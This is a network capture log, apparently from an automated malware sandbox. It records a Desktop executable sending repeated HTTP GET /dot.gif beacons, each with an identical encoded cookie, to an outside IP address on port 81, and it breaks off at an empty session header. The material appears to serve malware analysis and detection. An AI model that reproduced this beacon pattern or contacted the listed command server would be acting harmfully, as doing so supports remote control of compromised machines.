Jan 9, 2025 23:07:18.937000990 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:19.055279970 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:19.996413946 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:20.114692926 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:21.065910101 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:21.176629066 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:22.114610910 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:22.223653078 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:23.193080902 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:23.301506042 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:24.239181995 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:24.348325968 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:25.283185959 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:25.396490097 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:26.363228083 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:26.491126060 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:27.461817980 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:27.582632065 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:28.531126022 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:28.646822929 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:29.594399929 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:29.707995892 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:30.651217937 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:30.800277948 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:31.733211040 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:31.848541975 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:32.823534966 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:32.942035913 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:34.699388027 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:33 GMT Content-Type: application/octet-stream Content-Length: 0
Jan 9, 2025 23:07:34.699481010 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:33 GMT Content-Type: application/octet-stream Content-Length: 0
Jan 9, 2025 23:07:34.699831963 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:34.819356918 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:35.823709965 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:35.953067064 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:36.904046059 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:37.020302057 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:37.954361916 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:38.067303896 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:39.009723902 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49769	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:39.130877018 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:40.069375038 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49770	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:40.301625967 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:41.239794970 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49771	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:41.348644018 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:42.298017025 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49772	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:42.411128998 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:43.354576111 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49773	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:43.473470926 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:44.428533077 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49774	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:44.552027941 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:45.505675077 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49775	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:45.629949093 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:46.595709085 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49776	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:46.708103895 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:47.676652908 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49777	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:47.787604094 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:48.736531019 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49778	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:48.866396904 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:49.843429089 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49779	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
